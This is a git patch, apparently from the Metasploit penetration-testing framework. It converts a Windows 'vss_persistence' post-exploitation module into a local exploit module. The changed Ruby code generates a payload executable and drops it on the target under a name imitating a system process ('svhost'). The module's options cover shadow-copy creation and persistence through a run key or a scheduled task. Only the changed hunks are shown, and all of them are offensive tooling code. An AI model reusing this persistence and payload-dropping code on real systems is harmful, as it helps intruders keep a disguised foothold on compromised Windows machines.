From 0b9cf24103cede3fbd8840717a3d6c5f671e51cb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Tue, 15 Oct 2013 11:11:04 -0500
Subject: [PATCH] Convert vss_persistence to Local Exploit

---
 .../windows/local}/vss_persistence.rb         | 26 ++++++++++++-------
 1 file changed, 16 insertions(+), 10 deletions(-)
 rename modules/{post/windows/manage => exploits/windows/local}/vss_persistence.rb (93%)

diff --git a/modules/post/windows/manage/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb
similarity index 93%
rename from modules/post/windows/manage/vss_persistence.rb
rename to modules/exploits/windows/local/vss_persistence.rb
index 1945275477..e3661578b9 100644
--- a/modules/post/windows/manage/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -7,14 +7,17 @@
 
 require 'msf/core'
 require 'rex'
+require 'msf/core/exploit/exe'
 
-class Metasploit4 < Msf::Post
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
 
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::ShadowCopy
   include Msf::Post::Windows::Services
   include Msf::Post::Windows::Registry
+  include Msf::Exploit::EXE
 
   def initialize(info={})
 
@@ -26,14 +29,17 @@ class Metasploit4 < Msf::Post
         been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY
         option, the user should need password in order to start session on the target machine.
       },
+      'Author'               => ['MrXors <Mr.Xors[at]gmail.com>'],
       'License'              => MSF_LICENSE,
       'Platform'             => ['win'],
       'SessionTypes'         => ['meterpreter'],
-      'Author'               => ['MrXors <Mr.Xors[at]gmail.com>'],
+      'Targets'              => [ [ 'Windows 7', {} ] ],
+      'DefaultTarget'        => 0,
       'References'           => [
         [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],
         [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']
-      ]
+      ],
+      'DisclosureDate'=> "Oct 21 2011"
     ))
 
     register_options(
@@ -44,13 +50,11 @@ class Metasploit4 < Msf::Post
         OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
         OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
-        OptPath.new('PATH', [ true, 'Path to Executable on your local system.'])
       ], self.class)
 
   end
 
-  def run
-    path = datastore['PATH']
+  def exploit
     @clean_up = ""
 
     print_status("Checking requirements...")
@@ -77,8 +81,8 @@ class Metasploit4 < Msf::Post
       return
     end
 
-    print_status("Uploading #{path}....")
-    remote_file = upload(path, datastore['RPATH'])
+    print_status("Uploading payload...")
+    remote_file = upload(datastore['RPATH'])
 
     print_status("Creating Shadow Volume Copy...")
     unless volume_shadow_copy
@@ -117,7 +121,7 @@ class Metasploit4 < Msf::Post
     end
   end
 
-  def upload(file, trg_loc="")
+  def upload(trg_loc="")
     if trg_loc.nil? or trg_loc.empty?
       location = "\\Windows\\Temp"
     else
@@ -127,8 +131,10 @@ class Metasploit4 < Msf::Post
     file_name  = "svhost#{rand(100)}.exe"
     file_on_target = "#{location}\\#{file_name}"
 
+    exe = generate_payload_exe
+
     begin
-      upload_file("#{file_on_target}","#{file}")
+      write_file("#{file_on_target}", exe)
     rescue ::Rex::Post::Meterpreter::RequestError => e
       fail_with(Failure::NotFound, e.message)
     end